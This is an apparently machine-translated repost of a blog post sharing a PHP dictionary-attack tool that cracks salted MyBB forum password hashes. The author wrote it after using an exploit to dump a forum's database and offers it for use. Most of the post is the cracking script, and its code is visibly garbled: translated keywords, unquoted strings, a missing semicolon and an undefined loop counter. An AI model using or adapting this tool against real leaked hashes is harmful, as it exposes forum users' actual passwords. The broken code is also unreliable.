ホームページ >バックエンド開発 >PHPチュートリアル >MyBB フォーラム プログラム パスワード ブルート フォース クラッキング ツール PHP バージョン_PHP チュートリアル

MyBB フォーラム プログラム パスワード ブルート フォース クラッキング ツール PHP バージョン_PHP チュートリアル

WBOY
WBOYオリジナル
2016-07-13 17:34:062710ブラウズ

2日前に見たmyBBフォーラムのエクスプロイトの後、解読されたパスワードは非常に異常でした~md5(md5(salt).md(pass))の形式でした~
進展はありません~と書きました今日は 1 つ 小さなアプリケーション ~ みんなに使ってもらえると嬉しいです ~
pass.txt はパスワード辞書です ~~1 行に 1 つ~

さらに、このプログラムは非常にくだらない英語の文字を使用していますが、プログラムは完全にオリジナルです〜

[クリップボードにコピー] [ - ]CODE:
/*
MyBB フォーラム プログラム パスワード ブルート フォース クラッキング ツール PHP バージョン By Cool_wXd[C.R.S.T]
このプログラムは主に MyBB フォーラム プログラム パスワード暗号化フォーム md5(md5) 用です(salt).md5(password))
インターネット上のMyBBのエクスプロイトプログラムはデータベース内のパスワードを解読するだけで、実際のパスワードを解読しなかったためです
最近そのような問題に遭遇したためでもあり、このようなことを書きました簡単なプログラムです。このプログラムがお役に立てば幸いです。
*/
if ($argc<3)
{
print "--------------------------------- ---------------------------- ";
print " MyBB パスワード クラッカー v1.0 ";
印刷" -------------------------------------- ------------------ ";
print "使用法: mybb_password_cracker.php [md5_hash] [salt] ";
印刷" -------------------------------------- ------------------ ";
print "http://www.wolfexp.net & http://hi.baidu.com/cool_wxd 「;
print」 By Cool_wXd[C.R.S.T] ";
印刷" -------------------------------------- ------------------ ";
die;
}
function Salt_password($password, $salt)
{
return md5(md5($salt).md5($password));
}
$md5_hash = $argv[1];
$ Salt = $argv[2];
$dict="pass.txt";//パスワード辞書
if (strlen($md5_hash)!=32) {echo エラー... md5_hash は 32 ビットでなければなりません;}
if(!file_exists($dict)) {echo パスワード辞書が見つかりません;die;}
$dict_pass=file($dict)
for($i=0; $i<$num;$i++)
{
$now_password=chop($dict_pass[$i]);
if($md5_hash==salt_password($now_password,$salt)) {echo Success!(.$md5_hash. ) がクラックされ、本当のパスワードは次のとおりです: (.$now_password.);break;}}
?>
さらに、テストしたフォーラムの登録アカウントのクラックされたパスワードは次のとおりです



http://www.bkjia.com/PHPjc/508529.htmlwww.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/508529.html技術記事 2日前にmyBBフォーラムのエクスプロイトを見た後、クラックされたパスワードは非常に異常でした〜それはmd5(md5(salt).md(pass))の形式でした〜進歩はありません〜今日は小さなことを書きました。 ..
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。